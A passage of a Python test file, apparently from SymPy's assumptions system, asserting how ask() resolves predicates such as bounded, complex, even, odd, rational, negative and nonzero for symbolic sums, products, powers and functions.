    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & Q.negative(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.negative(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.negative(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.negative(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) is False
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.negative(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.negative(y)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.negative(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & Q.positive(z)) is False
    assert ask(Q.bounded(a), Q.negative(x) & Q.negative(y) & Q.negative(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.negative(y)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.negative(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.negative(x) & Q.positive(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a)) is None
    assert ask(Q.bounded(a), Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(y) & Q.positive(z)) is None
    assert ask(Q.bounded(a), Q.positive(x) & Q.positive(y) & Q.positive(z)) is None
    # products
    x, y, z = symbols('x,y,z')
    assert ask(Q.bounded(2*x)) is None
    assert ask(Q.bounded(2*x), Q.bounded(x)) is True
    a = x*y
    x, y = a.args
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y)) is False
    assert ask(Q.bounded(a), Q.bounded(x)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(y)) is False
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y)) is False
    assert ask(Q.bounded(a), ~Q.bounded(x)) is None
    assert ask(Q.bounded(a), Q.bounded(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y)) is None
    assert ask(Q.bounded(a)) is None
    a = x*y*z
    x, y, z = a.args
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.bounded(z)) is True
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.bounded(x)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(y) & Q.bounded(z)) is False
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.bounded(z)) is False
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) is False
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(x)) is None
    assert ask(Q.bounded(a), Q.bounded(y) & Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), Q.bounded(y)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y) & Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y) & ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y)) is None
    assert ask(Q.bounded(a), Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(z) & Q.nonzero(x) & Q.nonzero(y) & Q.nonzero(z)) is None
    assert ask(Q.bounded(a), ~Q.bounded(y) & ~Q.bounded(z) & Q.nonzero(x) & Q.nonzero(y) & Q.nonzero(z)) is False
    # powers
    x, y, z = symbols('x,y,z')
    assert ask(Q.bounded(x**2)) is None
    assert ask(Q.bounded(2**x)) is None
    assert ask(Q.bounded(2**x), Q.bounded(x)) is True
    assert ask(Q.bounded(x**x)) is None
    assert ask(Q.bounded(Rational(1, 2)**x)) is None
    assert ask(Q.bounded(Rational(1, 2)**x), Q.positive(x)) is True
    assert ask(Q.bounded(Rational(1, 2)**x), Q.negative(x)) is None
    assert ask(Q.bounded(S(2)**x), Q.negative(x)) is True
    assert ask(Q.bounded(sqrt(x))) is None
    assert ask(Q.bounded(2**x), ~Q.bounded(x)) is False
    assert ask(Q.bounded(x**2), ~Q.bounded(x)) is False
    # sign function
    assert ask(Q.bounded(sign(x))) is True
    assert ask(Q.bounded(sign(x)), ~Q.bounded(x)) is True
    # exponential functions
    assert ask(Q.bounded(log(x))) is None
    assert ask(Q.bounded(log(x)), Q.bounded(x)) is True
    assert ask(Q.bounded(exp(x))) is None
    assert ask(Q.bounded(exp(x)), Q.bounded(x)) is True
    assert ask(Q.bounded(exp(2))) is True
    # trigonometric functions
    assert ask(Q.bounded(sin(x))) is True
    assert ask(Q.bounded(sin(x)), ~Q.bounded(x)) is True
    assert ask(Q.bounded(cos(x))) is True
    assert ask(Q.bounded(cos(x)), ~Q.bounded(x)) is True
    assert ask(Q.bounded(2*sin(x))) is True
    assert ask(Q.bounded(sin(x)**2)) is True
    assert ask(Q.bounded(cos(x)**2)) is True
    assert ask(Q.bounded(cos(x) + sin(x))) is True
@XFAIL
def test_bounded_xfail():
    """We need to support relations in ask for this to work."""
    x = Symbol('x')
    # sin(x)**x and cos(x)**x are bounded only where the base is
    # nonnegative; deciding this needs relational support in ask.
    assert ask(Q.bounded(sin(x)**x)) is True
    assert ask(Q.bounded(cos(x)**x)) is True
def test_commutative():
    """By default objects are commutative, so Q.commutative is True unless
    non-commutativity is explicitly assumed; the assumption propagates
    through Add, Mul and Pow."""
    x, y = symbols('x,y')
    assert ask(Q.commutative(x)) is True
    assert ask(Q.commutative(x), ~Q.commutative(x)) is False
    assert ask(Q.commutative(x), Q.complex(x)) is True
    assert ask(Q.commutative(x), Q.imaginary(x)) is True
    assert ask(Q.commutative(x), Q.real(x)) is True
    assert ask(Q.commutative(x), Q.positive(x)) is True
    # an assumption about a different symbol has no effect
    assert ask(Q.commutative(x), ~Q.commutative(y)) is True
    assert ask(Q.commutative(2*x)) is True
    assert ask(Q.commutative(2*x), ~Q.commutative(x)) is False
    assert ask(Q.commutative(x + 1)) is True
    assert ask(Q.commutative(x + 1), ~Q.commutative(x)) is False
    assert ask(Q.commutative(x**2)) is True
    assert ask(Q.commutative(x**2), ~Q.commutative(x)) is False
    assert ask(Q.commutative(log(x))) is True
def test_complex():
    """Q.complex propagation: every real/rational/imaginary assumption
    implies complex, and complexness is closed under Add, Mul, Pow and
    the elementary functions."""
    x, y = symbols('x,y')
    assert ask(Q.complex(x)) is None
    assert ask(Q.complex(x), Q.complex(x)) is True
    assert ask(Q.complex(x), Q.complex(y)) is None
    assert ask(Q.complex(x), ~Q.complex(x)) is False
    assert ask(Q.complex(x), Q.real(x)) is True
    assert ask(Q.complex(x), ~Q.real(x)) is None
    assert ask(Q.complex(x), Q.rational(x)) is True
    assert ask(Q.complex(x), Q.irrational(x)) is True
    assert ask(Q.complex(x), Q.positive(x)) is True
    assert ask(Q.complex(x), Q.imaginary(x)) is True
    # a + b
    assert ask(Q.complex(x + 1), Q.complex(x)) is True
    assert ask(Q.complex(x + 1), Q.real(x)) is True
    assert ask(Q.complex(x + 1), Q.rational(x)) is True
    assert ask(Q.complex(x + 1), Q.irrational(x)) is True
    assert ask(Q.complex(x + 1), Q.imaginary(x)) is True
    assert ask(Q.complex(x + 1), Q.integer(x)) is True
    assert ask(Q.complex(x + 1), Q.even(x)) is True
    assert ask(Q.complex(x + 1), Q.odd(x)) is True
    assert ask(Q.complex(x + y), Q.complex(x) & Q.complex(y)) is True
    assert ask(Q.complex(x + y), Q.real(x) & Q.imaginary(y)) is True
    # a*x + b
    assert ask(Q.complex(2*x + 1), Q.complex(x)) is True
    assert ask(Q.complex(2*x + 1), Q.real(x)) is True
    assert ask(Q.complex(2*x + 1), Q.positive(x)) is True
    assert ask(Q.complex(2*x + 1), Q.rational(x)) is True
    assert ask(Q.complex(2*x + 1), Q.irrational(x)) is True
    assert ask(Q.complex(2*x + 1), Q.imaginary(x)) is True
    assert ask(Q.complex(2*x + 1), Q.integer(x)) is True
    assert ask(Q.complex(2*x + 1), Q.even(x)) is True
    assert ask(Q.complex(2*x + 1), Q.odd(x)) is True
    # x**2
    assert ask(Q.complex(x**2), Q.complex(x)) is True
    assert ask(Q.complex(x**2), Q.real(x)) is True
    assert ask(Q.complex(x**2), Q.positive(x)) is True
    assert ask(Q.complex(x**2), Q.rational(x)) is True
    assert ask(Q.complex(x**2), Q.irrational(x)) is True
    assert ask(Q.complex(x**2), Q.imaginary(x)) is True
    assert ask(Q.complex(x**2), Q.integer(x)) is True
    assert ask(Q.complex(x**2), Q.even(x)) is True
    assert ask(Q.complex(x**2), Q.odd(x)) is True
    # 2**x
    assert ask(Q.complex(2**x), Q.complex(x)) is True
    assert ask(Q.complex(2**x), Q.real(x)) is True
    assert ask(Q.complex(2**x), Q.positive(x)) is True
    assert ask(Q.complex(2**x), Q.rational(x)) is True
    assert ask(Q.complex(2**x), Q.irrational(x)) is True
    assert ask(Q.complex(2**x), Q.imaginary(x)) is True
    assert ask(Q.complex(2**x), Q.integer(x)) is True
    assert ask(Q.complex(2**x), Q.even(x)) is True
    assert ask(Q.complex(2**x), Q.odd(x)) is True
    assert ask(Q.complex(x**y), Q.complex(x) & Q.complex(y)) is True
    # trigonometric expressions
    assert ask(Q.complex(sin(x))) is True
    assert ask(Q.complex(sin(2*x + 1))) is True
    assert ask(Q.complex(cos(x))) is True
    assert ask(Q.complex(cos(2*x + 1))) is True
    # exponential
    assert ask(Q.complex(exp(x))) is True
    # complex-valued functions of a complex argument
    assert ask(Q.complex(Abs(x))) is True
    assert ask(Q.complex(re(x))) is True
    assert ask(Q.complex(im(x))) is True
def test_even():
    """Q.even propagation through products, sums and Abs/re/im."""
    x, y, z, t = symbols('x,y,z,t')
    assert ask(Q.even(x)) is None
    assert ask(Q.even(x), Q.integer(x)) is None
    assert ask(Q.even(x), ~Q.integer(x)) is False
    assert ask(Q.even(x), Q.rational(x)) is None
    assert ask(Q.even(x), Q.positive(x)) is None
    assert ask(Q.even(2*x)) is None
    assert ask(Q.even(2*x), Q.integer(x)) is True
    assert ask(Q.even(2*x), Q.even(x)) is True
    assert ask(Q.even(2*x), Q.irrational(x)) is False
    assert ask(Q.even(2*x), Q.odd(x)) is True
    assert ask(Q.even(2*x), ~Q.integer(x)) is None
    assert ask(Q.even(3*x), Q.integer(x)) is None
    assert ask(Q.even(3*x), Q.even(x)) is True
    assert ask(Q.even(3*x), Q.odd(x)) is False
    assert ask(Q.even(x + 1), Q.odd(x)) is True
    assert ask(Q.even(x + 1), Q.even(x)) is False
    assert ask(Q.even(x + 2), Q.odd(x)) is False
    assert ask(Q.even(x + 2), Q.even(x)) is True
    assert ask(Q.even(7 - x), Q.odd(x)) is True
    assert ask(Q.even(7 + x), Q.odd(x)) is True
    assert ask(Q.even(x + y), Q.odd(x) & Q.odd(y)) is True
    assert ask(Q.even(x + y), Q.odd(x) & Q.even(y)) is False
    assert ask(Q.even(x + y), Q.even(x) & Q.even(y)) is True
    assert ask(Q.even(2*x + 1), Q.integer(x)) is False
    # original asserted Q.rational(x) & Q.rational(x) (same symbol twice);
    # y is clearly what the 2*x*y expression intends
    assert ask(Q.even(2*x*y), Q.rational(x) & Q.rational(y)) is None
    assert ask(Q.even(2*x*y), Q.irrational(x) & Q.irrational(y)) is None
    assert ask(Q.even(x + y + z), Q.odd(x) & Q.odd(y) & Q.even(z)) is True
    assert ask(Q.even(x + y + z + t),
               Q.odd(x) & Q.odd(y) & Q.even(z) & Q.integer(t)) is None
    assert ask(Q.even(Abs(x)), Q.even(x)) is True
    assert ask(Q.even(Abs(x)), ~Q.even(x)) is None
    assert ask(Q.even(re(x)), Q.even(x)) is True
    assert ask(Q.even(re(x)), ~Q.even(x)) is None
    assert ask(Q.even(im(x)), Q.even(x)) is True
    # the imaginary part of a real number is zero, which is even
    assert ask(Q.even(im(x)), Q.real(x)) is True
def test_extended_real():
    """Q.extended_real covers the reals plus the signed infinities."""
    x = symbols('x')
    assert ask(Q.extended_real(x), Q.positive(x)) is True
    assert ask(Q.extended_real(-x), Q.positive(x)) is True
    assert ask(Q.extended_real(-x), Q.negative(x)) is True
    # real + oo is extended real even though it is not real
    assert ask(Q.extended_real(x + S.Infinity), Q.real(x)) is True
def test_rational():
    """Q.rational propagation through scaling, division and reciprocals."""
    x, y = symbols('x,y')
    assert ask(Q.rational(x), Q.integer(x)) is True
    assert ask(Q.rational(x), Q.irrational(x)) is False
    assert ask(Q.rational(x), Q.real(x)) is None
    assert ask(Q.rational(x), Q.positive(x)) is None
    assert ask(Q.rational(x), Q.negative(x)) is None
    assert ask(Q.rational(x), Q.nonzero(x)) is None
    assert ask(Q.rational(2*x), Q.rational(x)) is True
    assert ask(Q.rational(2*x), Q.integer(x)) is True
    assert ask(Q.rational(2*x), Q.even(x)) is True
    assert ask(Q.rational(2*x), Q.odd(x)) is True
    assert ask(Q.rational(2*x), Q.irrational(x)) is False
    assert ask(Q.rational(x/2), Q.rational(x)) is True
    assert ask(Q.rational(x/2), Q.integer(x)) is True
    assert ask(Q.rational(x/2), Q.even(x)) is True
    assert ask(Q.rational(x/2), Q.odd(x)) is True
    assert ask(Q.rational(x/2), Q.irrational(x)) is False
    assert ask(Q.rational(1/x), Q.rational(x)) is True
    assert ask(Q.rational(1/x), Q.integer(x)) is True
    assert ask(Q.rational(1/x), Q.even(x)) is True
    assert ask(Q.rational(1/x), Q.odd(x)) is True
    assert ask(Q.rational(1/x), Q.irrational(x)) is False
    assert ask(Q.rational(2/x), Q.rational(x)) is True
    assert ask(Q.rational(2/x), Q.integer(x)) is True
    assert ask(Q.rational(2/x), Q.even(x)) is True
    assert ask(Q.rational(2/x), Q.odd(x)) is True
    assert ask(Q.rational(2/x), Q.irrational(x)) is False
    # with multiple symbols
    assert ask(Q.rational(x*y), Q.irrational(x) & Q.irrational(y)) is None
    assert ask(Q.rational(y/x), Q.rational(x) & Q.rational(y)) is True
    assert ask(Q.rational(y/x), Q.integer(x) & Q.rational(y)) is True
    assert ask(Q.rational(y/x), Q.even(x) & Q.rational(y)) is True
    assert ask(Q.rational(y/x), Q.odd(x) & Q.rational(y)) is True
    assert ask(Q.rational(y/x), Q.irrational(x) & Q.rational(y)) is False
def test_imaginary():
    """Q.imaginary (purely imaginary) propagation through Add and Mul."""
    x, y, z = symbols('x,y,z')
    I = S.ImaginaryUnit
    assert ask(Q.imaginary(x)) is None
    assert ask(Q.imaginary(x), Q.real(x)) is False
    assert ask(Q.imaginary(x), Q.prime(x)) is False
    assert ask(Q.imaginary(x + 1), Q.real(x)) is False
    # imaginary + nonzero real is neither real nor purely imaginary
    assert ask(Q.imaginary(x + 1), Q.imaginary(x)) is False
    assert ask(Q.imaginary(x + I), Q.real(x)) is False
    assert ask(Q.imaginary(x + I), Q.imaginary(x)) is True
    assert ask(Q.imaginary(x + y), Q.imaginary(x) & Q.imaginary(y)) is True
    assert ask(Q.imaginary(x + y), Q.real(x) & Q.real(y)) is False
    assert ask(Q.imaginary(x + y), Q.imaginary(x) & Q.real(y)) is False
    assert ask(Q.imaginary(x + y), Q.complex(x) & Q.real(y)) is None
    assert ask(Q.imaginary(I*x), Q.real(x)) is True
    # I times a purely imaginary number is real
    assert ask(Q.imaginary(I*x), Q.imaginary(x)) is False
    assert ask(Q.imaginary(I*x), Q.complex(x)) is None
    assert ask(Q.imaginary(x*y), Q.imaginary(x) & Q.real(y)) is True
    assert ask(Q.imaginary(x + y + z), Q.real(x) & Q.real(y) & Q.real(z)) is False
    assert ask(Q.imaginary(x + y + z), Q.real(x) & Q.real(y) & Q.imaginary(z)) is None
    assert ask(Q.imaginary(x + y + z), Q.real(x) & Q.imaginary(y) & Q.imaginary(z)) is False
def test_infinitesimal():
    """ask(Q.infinitesimal) under scaling and products with bounded factors."""
    x, y = symbols('x,y')
    assert ask(Q.infinitesimal(x)) == None
    assert ask(Q.infinitesimal(x), Q.infinitesimal(x)) == True
    assert ask(Q.infinitesimal(2*x), Q.infinitesimal(x)) == True
    # product with an unconstrained factor is undecidable
    assert ask(Q.infinitesimal(x*y), Q.infinitesimal(x)) == None
    assert ask(Q.infinitesimal(x*y), Q.infinitesimal(x) & Q.infinitesimal(y)) == True
    assert ask(Q.infinitesimal(x*y), Q.infinitesimal(x) & Q.bounded(y)) == True
    assert ask(Q.infinitesimal(x**2), Q.infinitesimal(x)) == True
def test_integer():
    """ask(Q.integer) under negated assumptions, scaling, and division."""
    x = symbols('x')
    assert ask(Q.integer(x)) == None
    assert ask(Q.integer(x), Q.integer(x)) == True
    assert ask(Q.integer(x), ~Q.integer(x)) == False
    assert ask(Q.integer(x), ~Q.real(x)) == False
    assert ask(Q.integer(x), ~Q.positive(x)) == None
    assert ask(Q.integer(x), Q.even(x) | Q.odd(x)) == True
    assert ask(Q.integer(2*x), Q.integer(x)) == True
    assert ask(Q.integer(2*x), Q.even(x)) == True
    assert ask(Q.integer(2*x), Q.prime(x)) == True
    assert ask(Q.integer(2*x), Q.rational(x)) == None
    assert ask(Q.integer(2*x), Q.real(x)) == None
    assert ask(Q.integer(sqrt(2)*x), Q.integer(x)) == False
    # halving: even/2 is an integer, odd/2 never is; /3 is undecidable
    assert ask(Q.integer(x/2), Q.odd(x)) == False
    assert ask(Q.integer(x/2), Q.even(x)) == True
    assert ask(Q.integer(x/3), Q.odd(x)) == None
    assert ask(Q.integer(x/3), Q.even(x)) == None
def test_negative():
    """ask(Q.negative) over negation, sums, products, and powers."""
    x, y = symbols('x,y')
    assert ask(Q.negative(x), Q.negative(x)) == True
    assert ask(Q.negative(x), Q.positive(x)) == False
    assert ask(Q.negative(x), ~Q.real(x)) == False
    assert ask(Q.negative(x), Q.prime(x)) == False
    assert ask(Q.negative(x), ~Q.prime(x)) == None
    assert ask(Q.negative(-x), Q.positive(x)) == True
    assert ask(Q.negative(-x), ~Q.positive(x)) == None
    assert ask(Q.negative(-x), Q.negative(x)) == False
    # NOTE(review): duplicate of the assertion three lines up
    assert ask(Q.negative(-x), Q.positive(x)) == True
    assert ask(Q.negative(x-1), Q.negative(x)) == True
    assert ask(Q.negative(x+y)) == None
    assert ask(Q.negative(x+y), Q.negative(x)) == None
    assert ask(Q.negative(x+y), Q.negative(x) & Q.negative(y)) == True
    assert ask(Q.negative(x**2)) == None
    assert ask(Q.negative(x**2), Q.real(x)) == False
    # non-integer exponent: sign undetermined for real base
    assert ask(Q.negative(x**1.4), Q.real(x)) == None
    assert ask(Q.negative(x*y)) == None
    assert ask(Q.negative(x*y), Q.positive(x) & Q.positive(y)) == False
    assert ask(Q.negative(x*y), Q.positive(x) & Q.negative(y)) == True
    assert ask(Q.negative(x*y), Q.complex(x) & Q.complex(y)) == None
    assert ask(Q.negative(x**y)) == None
    assert ask(Q.negative(x**y), Q.negative(x) & Q.even(y)) == False
    assert ask(Q.negative(x**y), Q.negative(x) & Q.odd(y)) == True
    assert ask(Q.negative(x**y), Q.positive(x) & Q.integer(y)) == False
    assert ask(Q.negative(Abs(x))) == False
def test_nonzero():
    """ask(Q.nonzero) over sums, scalings, products, and Abs."""
    x, y = symbols('x,y')
    assert ask(Q.nonzero(x)) == None
    assert ask(Q.nonzero(x), Q.real(x)) == None
    assert ask(Q.nonzero(x), Q.positive(x)) == True
    assert ask(Q.nonzero(x), Q.negative(x)) == True
    assert ask(Q.nonzero(x), Q.negative(x) | Q.positive(x)) == True
    assert ask(Q.nonzero(x+y)) == None
    assert ask(Q.nonzero(x+y), Q.positive(x) & Q.positive(y)) == True
    # opposite signs may cancel to zero
    assert ask(Q.nonzero(x+y), Q.positive(x) & Q.negative(y)) == None
    assert ask(Q.nonzero(x+y), Q.negative(x) & Q.negative(y)) == True
    assert ask(Q.nonzero(2*x)) == None
    assert ask(Q.nonzero(2*x), Q.positive(x)) == True
    assert ask(Q.nonzero(2*x), Q.negative(x)) == True
    assert ask(Q.nonzero(x*y), Q.nonzero(x)) == None
    assert ask(Q.nonzero(x*y), Q.nonzero(x) & Q.nonzero(y)) == True
    assert ask(Q.nonzero(Abs(x))) == None
    assert ask(Q.nonzero(Abs(x)), Q.nonzero(x)) == True
def test_odd():
    """ask(Q.odd) over negation, scaling, shifts, sums, and products
    of integer/even/odd symbols (None means undecidable)."""
    x, y, z, t = symbols('x,y,z,t')
    assert ask(Q.odd(x)) == None
    assert ask(Q.odd(x), Q.odd(x)) == True
    assert ask(Q.odd(x), Q.integer(x)) == None
    assert ask(Q.odd(x), ~Q.integer(x)) == False
    assert ask(Q.odd(x), Q.rational(x)) == None
    assert ask(Q.odd(x), Q.positive(x)) == None
    assert ask(Q.odd(-x), Q.odd(x)) == True
    assert ask(Q.odd(2*x)) == None
    assert ask(Q.odd(2*x), Q.integer(x)) == False
    assert ask(Q.odd(2*x), Q.odd(x)) == False
    assert ask(Q.odd(2*x), Q.irrational(x)) == False
    assert ask(Q.odd(2*x), ~Q.integer(x)) == None
    assert ask(Q.odd(3*x), Q.integer(x)) == None
    assert ask(Q.odd(x/3), Q.odd(x)) == None
    assert ask(Q.odd(x/3), Q.even(x)) == None
    assert ask(Q.odd(x+1), Q.even(x)) == True
    assert ask(Q.odd(x+2), Q.even(x)) == False
    assert ask(Q.odd(x+2), Q.odd(x)) == True
    assert ask(Q.odd(3-x), Q.odd(x)) == False
    assert ask(Q.odd(3-x), Q.even(x)) == True
    assert ask(Q.odd(3+x), Q.odd(x)) == False
    assert ask(Q.odd(3+x), Q.even(x)) == True
    assert ask(Q.odd(x+y), Q.odd(x) & Q.odd(y)) == False
    assert ask(Q.odd(x+y), Q.odd(x) & Q.even(y)) == True
    assert ask(Q.odd(x-y), Q.even(x) & Q.odd(y)) == True
    assert ask(Q.odd(x-y), Q.odd(x) & Q.odd(y)) == False
    assert ask(Q.odd(x+y+z), Q.odd(x) & Q.odd(y) & Q.even(z)) == False
    assert ask(Q.odd(x+y+z+t), Q.odd(x) & Q.odd(y) & Q.even(z) & Q.integer(t)) == None
    assert ask(Q.odd(2*x + 1), Q.integer(x)) == True
    assert ask(Q.odd(2*x + y), Q.integer(x) & Q.odd(y)) == True
    assert ask(Q.odd(2*x + y), Q.integer(x) & Q.even(y)) == False
    assert ask(Q.odd(2*x + y), Q.integer(x) & Q.integer(y)) == None
    assert ask(Q.odd(x*y), Q.odd(x) & Q.even(y)) == False
    assert ask(Q.odd(x*y), Q.odd(x) & Q.odd(y)) == True
    # Fixed copy-paste typo: the second conjunct assumed x twice instead
    # of y; the expected result (None) is unchanged either way.
    assert ask(Q.odd(2*x*y), Q.rational(x) & Q.rational(y)) == None
    assert ask(Q.odd(2*x*y), Q.irrational(x) & Q.irrational(y)) == None
    assert ask(Q.odd(Abs(x)), Q.odd(x)) == True
def test_prime():
    """ask(Q.prime): products and powers of integers are composite."""
